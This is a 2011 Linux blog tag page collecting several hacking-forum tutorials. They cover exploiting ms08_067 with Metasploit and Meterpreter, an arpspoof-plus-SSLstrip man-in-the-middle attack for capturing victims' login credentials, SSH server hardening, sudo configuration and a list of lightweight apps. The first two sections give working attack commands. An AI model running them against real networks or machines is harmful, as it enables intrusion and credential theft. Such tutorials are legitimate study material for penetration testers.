Tag: linux

An Introduction To The Metasploit Framework
What is the Metasploit Framework?
The Metasploit Framework is an incredible tool for pen-testers and hackers. Used globally by even the most professional of penetration testers, Metasploit presents the user with a large number of exploits, payloads and auxiliary modules which can all be used to test anything from the common household machine to complex servers in an office block. Whatever your reason is for using the Metasploit framework, you should rest assured that it will be one of the best tools in your arsenal.Starting up Metasploit
Now, without further ado, let’s get down to business. I usually start by firing up Metasploit in a terminal, using the msfconsole version. Metasploit has a few different versions, including a more graphically based one. They all have their purposes, but I much prefer msfconsole just because it’s all command line based, and it’s very powerful. To start msfconsole, open up your terminal and type;

Code:

msfconsole

Hit enter, and let it do it’s thing. If you’ve just updated or it’s your first time running the tool then it might take a little while to get started.

Updating the Metasploit Framework
Before we get started, you’ll probably need to update a few things. Run the command “msfupdate”. Inside each update, you will find new exploits, various patches, improvements, new payloads – basically everything you can think of. It’s a very well maintained piece of kit! I usually update the whole system before doing anything major anyway, just in case there’s been a significant update in one of my packages. Once you start updating, it will look something like this…

Building Information on the Target using Nmap
Before we run in all-guns-blazing and cause a big mess, we need to build up some information on our target. The basic things which we will need to determine are as follows;

Target’s IP address (this will be internal for the sake of this guide)
Which ports are open
Which service is running on each port
The operating system of the target machine

As you go deeper into the world of pen-testing, you may find that you need more information on the subject. In fact, I recommend that you find out as much as you possibly can before starting a pen-test, using various information gathering techniques. I won’t go into detail here but I might write something on it in another article.

Open up a new terminal. We’re going to be using Nmap to identify the IP address of the target machine on the network by running a ping-scan. This doesn’t test any ports, it just pings machines to see if they exist or not.

Code:

nmap -sP 192.168.0.1/24

Running this command should return the IP addresses of machines on your network. Obviously you may need to switch your IP address up a little bit if it’s different to mine.

So, I’ve picked the machine I want to attack. In my case, it’s the Intel machine using the internal IP address of 192.168.0.6. Now, let’s get some more in depth information about this particular machine by running a port scan on it. I’m not going to bother with any real stealth on this scan seeing as it’s on my own network and I’m not trying to avoid detection. Therefore, I’ll only be using the -sS, -vv and -A flags for scanning. For a full list of nmap flags, check out the Nmap website. Run the command;

Code:

nmap -sS -A -vv 192.168.0.6

This kicks out a shit load of information onto my screen (thanks to the -vv flag, which makes the scan output “very verbose”). The main thing I’m looking at are the open ports on the machine.

PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
2869/tcp open http Microsoft HTTPAPI httpd 1.0 (SSDP/UPnP)

The bolded one is the one which I am going to try and exploit using the Metasploit framework. Unfortunately, I’m not going to do all the hard work for you. You need to get your Google hat on and start searching around for exploits for the services which came up in your nmap scan! Once you’ve found one, you might find that it’s already a part of the Metasploit Framework and you can search for it using the “search” function.

How to use Metasploit to Exploit a Computer
Please note that I’m using old screenshots in this section as my laptop died. Everything is exactly the same, including the port/service and IP address used! Just don’t mind the old-school Backtrack design.

So, we’ve got our IP address, our open ports, the services running on each port, and we’ve determined which service we’re going to exploit. Now we can get down to the fun part – exploiting and gaining access to the machine! Switch back to your msfconsole window and you should find that everything is loaded and ready to go. We’re going to do things in the following order;

1. Search for and use an exploit
2. Set the payload
3. Set options
4. Run the exploit

1. To search for an exploit, type the word “search” followed by the keyword you wish to search for. For example, I’m looking for the ms08_067_netapi exploit, so I type the following into the search;

Code:

search ms08_067

If you want to instead display every single exploit available in the Metasploit Framework, type “show exploits” into the console. Once you have found your exploit, you will need to “use” it so that Metasploit knows that it’s the one you want. To do this, type the following, replacing my exploit with your chosen one;

Code:

use exploit/windows/smb/ms08_067_netapi

2. Next, you are going to need to set the payload which you will be using. A payload is something which runs after the exploit has been run, and can do many different things. For example, you may want to get a shell on the victim, in which case you’d choose one of the shell payloads. However, in this example I will be using a Meterpreter payload. Meterpreter is a very fun tool and I think you’ll enjoy it the most out of them all.

To show all the payloads available, simply type in the following;

Code:

show payloads

Or you can search for a specific one like I did, by typing;

Code:

search payloads meterpreter

To set your payload, type the following into the console, replacing my payload with one of your choice;

Code:

set PAYLOAD windows/meterpreter/bind_tcp

3. Once your payload is set, we need to quickly set a few options up. Type the following into your console to get the options up;

Code:

show options

In my case, all I need to do is set the RHOST which is the IP address of the target machine. It’s already chosen the correct port for me.

4.Finally, we’re ready to run the exploit! It’s as simple as typing…

Code:

exploit

Now, you’ll see the exploit getting to work!

I’ve popped open a Meterpreter session, as you can see in the screenshot. This allows me to do a shit load of stuff, which you can read about in the Metasploit Unleashed guide. For the purpose of the guide, I popped open a shell on the other computer after migrating to a different process. This shows the power of the Metasploit Framework and Meterpreter!

So, what next?
This guide was designed to push you in the right direction, as I really wanted something like this to read when I was first learning about MSF. Next, you should read about maintaining access to the computer with a backdoor, and other things. I totally recommend reading up on a few things though, so check out these links for more information.

Metasploit Unleashed
Nmap Reference Guide

Discuss http://www.totse.info/bbs/showthread.php/17651-An-Introduction-To-The-Metasploit-Framework
July 23, 2011
How to Perform a Man In The Middle Attack Using Arpspoof and SSLstrip
SSLstrip, is a tool which you can use when you’re performing MITM (Man In The Middle) attacks. It’s very fun to use and can often produce some very interesting results, especially when combined with other tools such as Driftnet, MSGsnarf or URLsnarf! These particular tools can uncover things such as URL’s which the victim is clicking on, images from the website which the victim is currently surfing (which you can actually save onto your own PC) and even real-time chats on Instant Messaging software like IRC. SSLstrip allows you to capture login information such as usernames and passwords.

For this guide, you will need a computer with arpspoof and SSLstrip installed, as well as nmap for finding your target’s IP address. I recommend downloading Backtrack as it comes with all these tools out of the box.

How to Enable IP Forwarding

Enabling IP forwarding allows packets to pass through your machine. You need this to happen so that you can get in the middle of the victim’s machine and the router, hence the name “Man in the Middle”. To enable IP forwarding, type this into a terminal;
```
echo 1 > /proc/sys/net/ipv4/ip_forward
```
How to Configure your IPtables for ARP Spoofing

Get your terminal up on the screen and type in the following;
```
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
```
As you can probably tell, this will to forward outgoing traffic on port 80 from the victim’s machine to your machine, which is going to be running SSLstrip on port 8080.

Finding Your Target’s IP address

Open a terminal and do a ping scan of the network, by issuing a command such as;
```
nmap -sP 192.168.0.1-255
```
Find the machine which you want to do a MITM attack on and copy down it’s IP address somewhere. That’s all we need to do for this step, so move on!

How to use Arpspoof

Arpspoofing allows you to redirect packets from the victim’s computer, straight to your machine. You then pass the packets along to the router as normal, meaning that the victim won’t even know it’s happening. After you capture traffic, SSLstrip will modify it before IPtables sends it away again. Fire up a new terminal and type in the following;
```
arpspoof -i wlan0 -t 192.168.0.5 192.168.0.1
```
The -i flag determines the interface used, and the -t flag is your target IP address. The second IP address is that of the router. Once you hit enter, you should start to see incoming traffic traffic from the victim, which is then forwarded to the router.

How to use SSLstrip to Capture Login Credentials

Open another terminal. Navigate to /pentest/web/sslstrip and run SSLstrip by typing the following command;
```
python ./sslstrip.py -k -l 8080 -w /root/Desktop/sslstrip.log
```
This will start SSLstrip, listening on port 8080. The -w flag allows you to write your results to a file. The -k flag also kills all current sessions, forcing the client to log into websites again. Feel free to remove this flag if that’s not something you want to do.

If you open another terminal window/tab and type “tail -F /root/Desktop/sslstrip.log” then you will get real-time updates as the log file is written to. When a user logs into a website, their login credentials will be displayed in the file, like this!

Re-ARPing

Hit CTRL+C to kill your ARP spoofing, your SSLstrip and anything else you’ve got going on. This has a very high chance of putting the whole network offline for a second, which is the only downside to ARP spoofing. However, it shouldn’t be a problem as everything will right itself quickly!

Enjoy.
July 21, 2011
How to Set up and Secure an SSH Server
What is SSH and Why Should I use it?

This is something which I recently learned and it’s already come in handy for me and a couple of very trusted people. What is SSH and why should you use it, you ask? Well, for a start, the clue is in the name – Secure Shell. SSH provides a secure, encrypted tunnel between two computers which can’t be sniffed (at least, not to my knowledge) which you can use to access your home machine when you’re out of the house. Through a secure shell, you can use the terminal to run commands, transfer files or even use your home internet connection from elsewhere!

How to install Open SSH Server

Firstly, run this command to download and install the server software.

Quote:

sudo apt-get install openssh-server

If you want, you can check that the server is running at this point by trying to connect to yourself by running the following command. It’s not necessary though, and there’s a chance that it might not work before configuring things first.

Quote:

ssh username@localhost

How to Configure and Secure an SSH Server

The configuration and security processes go hand in hand and can actually be done at the same time, making this a fairly easy thing to do. Unfortunately, it can be a little confusing for a total beginner. I had no idea what I was doing when I first had a shot at setting up my server, but I soon learned the ropes. Anyway, here’s a quick overview of what we’ll be doing;
- Opening a port on our router to allow incoming SSH traffic.
- Editing our sshd_config file.
- Taking a few security measures, such as disabling root logins and using authentication keys as opposed to passwords.
Opening a port on our router to allow incoming SSH traffic

So, go ahead and open up your router configuration page and add a firewall exception for a port of your choice. DON’T use port 22, even if it is the default SSH port. This will stop a lot of automated tools from scouring the web, finding your server and trying to access it. Choose a different port, such as 443 – the port which usually runs the HTTPS service. The benefit of using this port is so that if you’re establishing a connection from an organization (at work or school, for example), they could be blocking port 22. If you use 443, your traffic will appear to be travelling using the HTTPS protocol

Editing our sshd_config file

Open your file manager with root privileges (I’ll be using Nautilus for this tutorial) and browse to your “/etc/ssh” directory. In here is where your configuration file is located, and you’ll need to open up your sshd_config file. The first thing you will need to do is change the listening port to whatever you specified it as on your router configuration page – probably 443, like I suggested.

How to Secure an SSH Server
1. Scroll down and find the line “PermitRootLogin” – change the “yes” to a “no”.
2. Make sure that “RSAAuthentication” and “PubkeyAuthentication” are both set to “yes”, and that “AuthorizedKeysFile” is uncommented (remove the hash at the start of the line).
3. Scroll down, and check that “PermitEmptyPasswords” is set to “no”.
4. Make sure that “PasswordAuthentication” is set to “no” as well – this will force the use of authentication keys, which is MUCH more secure than password authentication which can be brute-forced.
5. Finally, scroll right to the bottom and make sure that “UsePAM” is set to “no”.
How to Connect to Your SSH Server

Now that the security is all taken care of, you will be eager to connect another device to your server. Grab your laptop (or whatever you’re using) and make sure that some kind of SSH client is installed on it. For Windows, you’ll be using PuTTY, Linux users might want to use openssh-client and for the people on Android Phones, download Connectbot.

Now, you’re going to need to generate a set of authentication keys. One is a private key, which will stay with you on your device – the other being a public key, which you will need to transfer to your server. If you’re on Windows, use the PuTTYGen application. Android users should open the menu and “Manage Pubkeys” to generate one, and Linux users should run the following command…

Quote:

ssh-keygen -t rsa

This will create an RSA encrypted public key for you to use Now, take a note of where the key is saved (if you’re on Windows or Android, don’t worry about this as it will be obvious what your public key is). Find a way of transferring your public key to your server – I usually just put it on a USB stick or email it to myself.

How to Authenticate Your Device With the Server

Once your public key is at hand, you’re going to need to add it to your “authorized_keys” file. So, open up your public key file and copy your key! Now, browse to the following location;

Quote:

/home/USERNAME/.ssh/authorized_keys

On the very first line of your file, paste your public key. Note that there can only be 1 key per line, so when you add more devices in the future, make sure you hit enter and go onto the second line before pasting your next key in.

Restart the Server Service

After messing around with any configurations, you need to restart the server service. You can do this by running the following command…

Quote:

sudo /etc/init.d/ssh restart

I found it beneficial to put that into a bash script called “ssh_restart”, so that I could quickly restart the server if I needed to.

Connect to Your Server!

On the other device, open up your SSH client and enter the correct information. For example, PuTTY users will need to specify your server IP address, hostname and port number to connect, as will Android devices. If you’re running Linux, then enter the following command…

Quote:

ssh username@hostname -p 443 (or whatever port you specified)

The server should then recognize that you’re authenticated already with the public key, and you should be presented with a shell!

Useful Links

Using PuTTYgen to create keys
OpenSSH Website
SSH Wikipedia Article

Discuss http://www.totse.info/bbs/showthread.php?t=15379
May 15, 2011
How to Use Sudo (and Why Ubuntu Sucks)
Sudo – How it should and should not be used

(And why Ubuntu sucks)

I love sudo. Yet at the same time I hate the Ubuntu-trend of disabling the root account and give the first user full root privileges through sudo. Hate it with a passion. So in this guide I will explain what sudo is, what it isn’t and how you should use it.

What is sudo?

Sudo – superuserdo – is an application which temporarily elevates the privileges of a regular user account to root privileges. This allows a user to run applications or commands with root privileges, even though the account on which the application is running is not a root account. Sudo can be configured to only allow certain predetermined applications & commands be ran with root privileges, or to allow anything and everything which has “sudo” in front of it to run with root privileges.

This is most useful in two cases:
1. Untrusted user: If you need to let somebody perform certain administrative tasks on a box but you don’t want to give him / her access to your root account. You give him a regular account and add a line to your /etc/sudoers file allowing him to run all the apps he needs to run with root privileges. He can do the job, but he can’t do anything else to compromise the security of the system.
2. Unsecure application: Very few applications should ever be ran as root. If for some reason an application requires root privileges (and you’re sure the application can be trusted and there is no way to do what needs to be done without root privileges) you can allow that application to run with root privileges, and only that application. That way the damage which can be done trough an exploit of the application is minimized; again if and only if the application is not a hacking tool itself.
Now, again, because a lot of people fail to understand this: any application ran with sudo runs with full root privileges, even though it runs from a regular account. If you do not trust an application, do not run it with root privileges, be it from the root account or trough sudo. The application can do pretty much anything it wants to do once you’ve allowed it to run trough sudo, including handing over the controls of your machine to a hacker.

So why bother using sudo at all, if you can’t run anything you don’t trust trough sudo you ask? Because trusted applications are at risk of exploits too. Trough those exploits it is possible for a hacker to inject little pieces of code into your machine. Now if the exploited application is running in a regular user account which cannot run anything but a couple specific applications as root, it’s a lot harder for the hacker to let his malware run with root privileges. He would have to make it look like the malware he injected is part of the binary executable of one of the trusted applications, because only those can be called trough sudo. And because the binary executables can only be modified with root privileges, that’s not an easy task. I’m pretty sure it’s not impossible either, but security is all about staying one step ahead of the bad guys so it does improve security tremendously.

Why ubuntu sucks

If you’ve paid attention, you now realize the whole sudo-instead-of-root mess canonical pushes the majority of linux users in is actually a security flaw instead of a security enhancement. In Ubuntu the first user account, and any following accounts which get appointed administrator privileges, can run anything trough sudo. Anything at all. That means it just got a whole lot easier for our hacker to get his malware to run with root privileges. All he has to do is log your sudo password and run his code trough sudo. From that moment on it is running with full root privileges.

Quick intro to sudo configuration

Configuring sudo is done by editing the /etc/sudoers file trough visudo as root. Visudo is a little application which makes sure no two people are editing the /etc/sudoers file at the same time and which checks the file for basic syntax errors before saving it.

By default visudo uses vi as editor. If you don’t like using vi, run this command to run visudo with nano (or any other editor you prefer) once:
Code:
```
# EDITOR=nano visudo
```
Here is a very simple example of an /etc/sudoers file from my download server:
Code:
```
# sudoers file.
#
# This file MUST be edited with the 'visudo' command as root.
# Failure to use 'visudo' may result in syntax or file permission errors
# that prevent sudo from running.
#
# See the sudoers man page for the details on how to write a sudoers file.
#

# Host alias specification

# User alias specification

# Cmnd alias specification

# Defaults specification

# Set default editor to nano:
Defaults        editor=/usr/bin/nano, !env_editor

# Runas alias specification

# User privilege specification
root    ALL=(ALL) ALL
amie    ALL= /usr/bin/pacman

# Uncomment to allow people in group wheel to run all commands
# %wheel        ALL=(ALL) ALL

# Same thing without a password
# %wheel        ALL=(ALL) NOPASSWD: ALL

# Samples
# %users  ALL=/sbin/mount /cdrom,/sbin/umount /cdrom
# %users  localhost=/sbin/shutdown -h now
```
As you can see in the example above, I’ve changed the default visudo editor to nano and I’ve allowed myself to run pacman (the package manager of Arch Linux) with elevated privileges. This is because I like to use yaourt as a package manager because it can automatically add and update packages from the arch user repositories. However, I do not want to run yaourt with root privileges because it’s not a part of the closest reviewed and most secure “core” applications. Luckily, the people who coded yaourt are as security-minded as I am so they made sure yaourt can run with user privileges. It just needs to be able to call pacman trough sudo to let pacman take care of the real installation / uninstallation work. If an application on my regular account – which is not the account used for downloading or logging into my X-server, mind you – gets exploited there is not much harm done. The worst that can happen is that it starts installing applications from the trusted arch repositories to my system / uninstalls any applications from my system. Annoying? Yes. Possibly harmful? Yes. But not nearly as bad as what could happen if I had been using my root account or if I had used sudo like an Ubuntu-monkey.

Now as you probably noticed, there are a lot of sections in that sudoers file which I haven’t even touched. That’s because sudo can be configured to allow multiple users to run different apps with root privileges on different hosts all from the same sudoers file. That way the senior system administrator only has to write one sudoers file and configure all his boxes to automatically rsync their sudoers file with the one he edited. Voila, adding a new junior sysadmin to several boxes with different permissions on each box has never been easier. Here’s an example of a more advanced (but still very basic) sudoers configuration in which all configuration options are explained pretty well.

If this guide made you grasp and think “Wow, and I thought I was being SAFE using sudo the canonical way!” my job here is done and you’re on your way to securing your box.

Discuss http://www.totse.info/bbs/showthread.php?t=9672
April 23, 2011
Lightweight Linux Apps
Here i will list light apps. I will not include cli apps. I will keep editing this. help make this list better.

Terminal
- xterm (installed on all distros)
- lxterminal
- mrxvt
- xfce-terminal
- mterminal
Web browser.
- midori
- arora
- conkeror
- Dooble
- reKonq
- epiphany
- dillo
- uzbl (if you can work out the vi-like controls)
- Kazehakase
Office
- Abiword (wordprocessor)
- GNUmeric (spreadsheet)
- scribus (desktop publishing)
- xpdf
- mupdf
- apvlv
- epdfviewer
- leafpad (text editor)
- gvim
- nano (really a cli tool but you’ll hardly notice)
Multimedia
- gnome-mplayer
- smplayer
- DeaDBeeF (foobar2000 like)
- Banshee (not particular lightwight – but my personal favorite)
- Kaffeine
- mpd + (quod libet, sonata, pympd, Xfmpc) but i don’t recommend this type of daemon/client setup as it never works right.
- Xfburm (disc burning)
IM
- empaphy (ubuntu default)
- emesene (MSN only)
- Sim-IM (Multi protocol)
- Ayttm (my personal favorite lighweight multi protocol IM)
- LostIRC
- WeeChat (irc)
Torrents
- Deluge
- transmission (Ubuntu default)
- Qbittoorent
Image Editors
- mtpaint
- Xpaint
- GNUpaint
Image Viewers
- feh
- ristretto
- mirage
Filemanager
- Thunar
- pcmanFM
- Rox-filer
Compression
- Squeeze
- Xarchive
- Xarchiver
Process monitors
- htop (ncurses but userfriendly)
- lxmonitor
WM/DE
I will not include tiling managers.
- Xfce4 (the most popular “lightweight” DE – currently sufferering from feature creep – closer to middle weight)
- fluxbox (I was a heavy user of this WM for a while)
- fvwm (currently my favorite lightweight WM)
- TWM (comes with Xorg – very featureless)
- Windowmaker (inspired by NEXTstep – i could never get hang of those boxes)
- JWM (used as default for DamnSmallLinux Puppy and Slitaz)
- IceWM (lightweight, used in the older eeePCs i think)
- LXDE
- openbox (you can replace with WM with the gnome default (metacity)) also works standalone.
For more check Arch Wiki List.

Discuss http://www.totse.info/bbs/showthread.php?t=5603
April 16, 2011